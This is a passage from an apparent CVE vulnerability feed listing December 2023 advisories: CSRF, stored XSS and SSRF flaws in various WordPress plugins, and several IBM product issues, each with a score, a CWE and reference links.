Cross-Site Request Forgery (CSRF) vulnerability in BinaryCarpenter Menu Bar Cart Icon For WooCommerce By Binary Carpenter.This issue affects Menu Bar Cart Icon For WooCommerce By Binary Carpenter: from n/a through 1.49.3.

CVE ID : CVE-2023-49855
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/bc-menu-cart-woo/wordpress-bc-menu-bar-cart-icon-for-woocommerce-by-binary-carpenter-plugin-1-49-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48762

First published on : 18-12-2023 17:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Crocoblock JetElements For Elementor.This issue affects JetElements For Elementor: from n/a through 2.6.13.

CVE ID : CVE-2023-48762
Source : audit@patchstack.com
CVSS Score : 6.3

References :
https://patchstack.com/database/vulnerability/jet-elements/wordpress-jetelements-for-elementor-plugin-2-6-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49165

First published on : 15-12-2023 14:15:15
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Real Big Plugins Client Dash allows Stored XSS.This issue affects Client Dash: from n/a through 2.2.1.

CVE ID : CVE-2023-49165
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/client-dash/wordpress-client-dash-plugin-2-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49174

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS.This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5.

CVE ID : CVE-2023-49174
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/responsive-lightbox/wordpress-responsive-lightbox-plugin-2-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49175

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS.This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1.

CVE ID : CVE-2023-49175
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/kp-fastest-tawk-to-chat/wordpress-kp-fastest-tawk-to-chat-plugin-1-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49180

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS.This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2.

CVE ID : CVE-2023-49180
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/automatic-youtube-video-posts/wordpress-automatic-youtube-video-posts-plugin-plugin-5-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49181

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS.This issue affects WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40.

CVE ID : CVE-2023-49181
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/wp-event-manager/wordpress-wp-event-manager-plugin-3-1-39-cross-site-scripting-xss-vulnerability-2?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49184

First published on : 15-12-2023 15:15:10
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS.This issue affects Parallax Slider Block: from n/a through 1.2.4.

CVE ID : CVE-2023-49184
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/parallax-slider-block/wordpress-parallax-slider-block-plugin-1-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49188

First published on : 15-12-2023 15:15:10
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS.This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4.

CVE ID : CVE-2023-49188
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/track-geolocation-of-users-using-contact-form-7/wordpress-track-geolocation-of-users-using-contact-form-7-plugin-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49189

First published on : 15-12-2023 16:15:43
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin – GetSocial.Io allows Stored XSS.This issue affects Social Share Buttons & Analytics Plugin – GetSocial.Io: from n/a through 4.3.12.

CVE ID : CVE-2023-49189
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/wp-share-buttons-analytics-by-getsocial/wordpress-social-share-buttons-analytics-plugin-getsocial-io-plugin-4-3-12-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49190

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS.This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6.

CVE ID : CVE-2023-49190
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/site-offline/wordpress-site-offline-or-coming-soon-or-maintenance-mode-plugin-1-5-6-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49191

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS.This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2.

CVE ID : CVE-2023-49191
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/gdpr-compliance-by-supsystic/wordpress-gdpr-cookie-consent-by-supsystic-plugin-2-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49747

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebFactory Ltd Guest Author allows Stored XSS.This issue affects Guest Author: from n/a through 2.3.

CVE ID : CVE-2023-49747
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/guest-author/wordpress-guest-author-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49767

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS.This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24.

CVE ID : CVE-2023-49767
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/biteship/wordpress-biteship-plugin-2-2-22-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49829

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS – eLearning and online course solution allows Stored XSS.This issue affects Tutor LMS – eLearning and online course solution: from n/a through 2.2.4.

CVE ID : CVE-2023-49829
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/tutor/wordpress-tutor-lms-plugin-2-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2022-40312

First published on : 18-12-2023 15:15:08
Last modified on : 18-12-2023 17:24:19

Description :
Server-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform.This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.1.

CVE ID : CVE-2022-40312
Source : audit@patchstack.com
CVSS Score : 5.5

References :
https://patchstack.com/database/vulnerability/give/wordpress-givewp-plugin-2-25-1-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-49744

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce.This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3.

CVE ID : CVE-2023-49744
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/gift-up/wordpress-gift-up-gift-cards-for-wordpress-and-woocommerce-plugin-2-21-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49824

First published on : 17-12-2023 11:15:07
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in PixelYourSite Product Catalog Feed by PixelYourSite.This issue affects Product Catalog Feed by PixelYourSite: from n/a through 2.1.1.

CVE ID : CVE-2023-49824
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/product-catalog-feed/wordpress-product-catalog-feed-by-pixelyoursite-plugin-2-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49834

First published on : 17-12-2023 11:15:08
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX – Currency Switcher Professional for WooCommerce.This issue affects FOX – Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4.

CVE ID : CVE-2023-49834
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/woocommerce-currency-switcher/wordpress-fox-currency-switcher-professional-for-woocommerce-plugin-1-4-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49854

First published on : 18-12-2023 11:15:13
Last modified on : 18-12-2023 14:05:17

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Tribe Interactive Caddy – Smart Side Cart for WooCommerce.This issue affects Caddy – Smart Side Cart for WooCommerce: from n/a through 1.9.7.

CVE ID : CVE-2023-49854
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/caddy/wordpress-caddy-plugin-1-9-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49843

First published on : 18-12-2023 15:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce.This issue affects First Order Discount Woocommerce: from n/a through 1.21.

CVE ID : CVE-2023-49843
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/first-order-discount-woocommerce/wordpress-first-order-discount-woocommerce-plugin-1-21-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49853

First published on : 18-12-2023 15:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in PayTR Ödeme ve Elektronik Para Kurulu?u A.?. PayTR Taksit Tablosu – WooCommerce.This issue affects PayTR Taksit Tablosu – WooCommerce: from n/a through 1.3.1.

CVE ID : CVE-2023-49853
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/paytr-taksit-tablosu-woocommerce/wordpress-paytr-taksit-tablosu-woocommerce-plugin-1-3-1-broken-authentication-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-33214

First published on : 18-12-2023 16:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics.This issue affects Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1.

CVE ID : CVE-2023-33214
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/taggbox-widget/wordpress-taggbox-ugc-galleries-social-media-widgets-user-reviews-analytics-plugin-2-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-47806

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login.This issue affects Disable User Login: from n/a through 1.3.7.

CVE ID : CVE-2023-47806
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/disable-user-login/wordpress-disable-user-login-plugin-1-3-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-46617

First published on : 18-12-2023 17:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in AdFoxly AdFoxly – Ad Manager, AdSense Ads & Ads.Txt.This issue affects AdFoxly – Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5.

CVE ID : CVE-2023-46617
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/adfoxly/wordpress-adfoxly-ad-manager-adsense-ads-ads-txt-plugin-1-8-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48772

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Arul Prasad J Prevent Landscape Rotation.This issue affects Prevent Landscape Rotation: from n/a through 2.0.

CVE ID : CVE-2023-48772
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/prevent-landscape-rotation/wordpress-prevent-landscape-rotation-plugin-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48773

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect.This issue affects WooCommerce Login Redirect: from n/a through 2.2.4.

CVE ID : CVE-2023-48773
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/woo-login-redirect/wordpress-woo-login-redirect-plugin-2-2-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48778

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in VillaTheme Product Size Chart For WooCommerce.This issue affects Product Size Chart For WooCommerce: from n/a through 1.1.5.

CVE ID : CVE-2023-48778
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/product-size-chart-for-woo/wordpress-product-size-chart-for-woocommerce-plugin-1-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49148

First published on : 18-12-2023 22:15:10
Last modified on : 18-12-2023 22:15:10

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates.This issue affects Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5.

CVE ID : CVE-2023-49148
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/affiliatebooster-blocks/wordpress-affiliate-booster-plugin-3-0-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49197

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case.This issue affects DoFollow Case by Case: from n/a through 3.4.2.

CVE ID : CVE-2023-49197
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/dofollow-case-by-case/wordpress-dofollow-case-by-case-plugin-3-4-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49749

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
Cross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!.This issue affects SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23.

CVE ID : CVE-2023-49749
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/suretriggers/wordpress-suretriggers-plugin-1-0-23-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-24380

First published on : 17-12-2023 10:15:07
Last modified on : 18-12-2023 14:05:28

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap.This issue affects Simple Wp Sitemap: from n/a through 1.2.1.

CVE ID : CVE-2023-24380
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/simple-wp-sitemap/wordpress-simple-wp-sitemap-plugin-1-2-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49751

First published on : 17-12-2023 10:15:07
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome.This issue affects Block for Font Awesome: from n/a through 1.4.0.

CVE ID : CVE-2023-49751
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/block-for-font-awesome/wordpress-block-for-font-awesome-plugin-1-3-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49769

First published on : 17-12-2023 10:15:07
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive.This issue affects Integrate Google Drive: from n/a through 1.3.4.

CVE ID : CVE-2023-49769
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/integrate-google-drive/wordpress-integrate-google-drive-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49775

First published on : 17-12-2023 10:15:08
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer.This issue affects CSV Importer: from n/a through 0.3.8.

CVE ID : CVE-2023-49775
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/csv-importer/wordpress-csv-importer-plugin-0-3-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49816

First published on : 17-12-2023 11:15:07
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair.This issue affects Fix My Feed RSS Repair: from n/a through 1.4.

CVE ID : CVE-2023-49816
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/fix-my-feed-rss-repair/wordpress-fix-my-feed-rss-repair-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-50372

First published on : 18-12-2023 11:15:14
Last modified on : 18-12-2023 14:05:17

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template.This issue affects Custom Post Type Page Template: from n/a through 1.1.

CVE ID : CVE-2023-50372
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/custom-post-type-page-template/wordpress-custom-post-type-page-template-plugin-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49840

First published on : 18-12-2023 15:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Palscode Multi Currency For WooCommerce.This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5.

CVE ID : CVE-2023-49840
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/wc-multi-currency/wordpress-multi-currency-for-woocommerce-plugin-1-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49844

First published on : 18-12-2023 15:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester.This issue affects WPPerformanceTester: from n/a through 2.0.0.

CVE ID : CVE-2023-49844
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/wpperformancetester/wordpress-wpperformancetester-plugin-2-0-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-47787

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings.This issue affects WooCommerce Bookings: from n/a through 2.0.3.

CVE ID : CVE-2023-47787
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/woocommerce-bookings/wordpress-woocommerce-bookings-plugin-2-0-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-47789

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method.This issue affects Canada Post Shipping Method: from n/a through 2.8.3.

CVE ID : CVE-2023-47789
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/woocommerce-shipping-canada-post/wordpress-woocommerce-canada-post-shipping-plugin-2-8-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48755

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress.This issue affects teachPress: from n/a through 9.0.4.

CVE ID : CVE-2023-48755
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/teachpress/wordpress-teachpress-plugin-9-0-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48766

First published on : 18-12-2023 17:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in SVGator SVGator – Add Animated SVG Easily.This issue affects SVGator – Add Animated SVG Easily: from n/a through 1.2.4.

CVE ID : CVE-2023-48766
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/svgator/wordpress-svgator-add-animated-svg-easily-plugin-1-2-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48768

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology.This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9.

CVE ID : CVE-2023-48768
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/wc-quantity-plus-minus-button/wordpress-quantity-plus-minus-button-for-woocommerce-by-codeastrology-plugin-1-1-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48769

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back.This issue affects Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3.

CVE ID : CVE-2023-48769
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/chat-bubble/wordpress-chat-bubble-plugin-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48781

First published on : 18-12-2023 22:15:10
Last modified on : 18-12-2023 22:15:10

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Marketing Rapel MkRapel Regiones y Ciudades de Chile para WC.This issue affects MkRapel Regiones y Ciudades de Chile para WC: from n/a through 4.3.0.

CVE ID : CVE-2023-48781
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/wc-ciudades-y-regiones-de-chile/wordpress-mkrapel-regiones-y-ciudades-de-chile-para-wc-plugin-4-3-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Source : us.ibm.com

Vulnerability ID : CVE-2023-46177

First published on : 18-12-2023 15:15:08
Last modified on : 18-12-2023 17:24:19

Description :
IBM MQ Appliance 9.3 LTS and 9.3 CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request to view arbitrary files on the system. IBM X-Force ID: 269536.

CVE ID : CVE-2023-46177
Source : psirt@us.ibm.com
CVSS Score : 6.5

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/269536 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091235 | source : psirt@us.ibm.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-47741

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
IBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim's PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532.

CVE ID : CVE-2023-47741
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://www.ibm.com/support/pages/node/7097785 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7097801 | source : psirt@us.ibm.com


Vulnerability ID : CVE-2023-40691

First published on : 18-12-2023 21:15:08
Last modified on : 18-12-2023 21:15:08

Description :
IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 may reveal sensitive information contained in application configuration to developer and administrator users. IBM X-Force ID: 264805.

CVE ID : CVE-2023-40691
Source : psirt@us.ibm.com
CVSS Score : 4.9

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/264805 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7096365 | source : psirt@us.ibm.com

Vulnerability : CWE-200


Source : vuldb.com

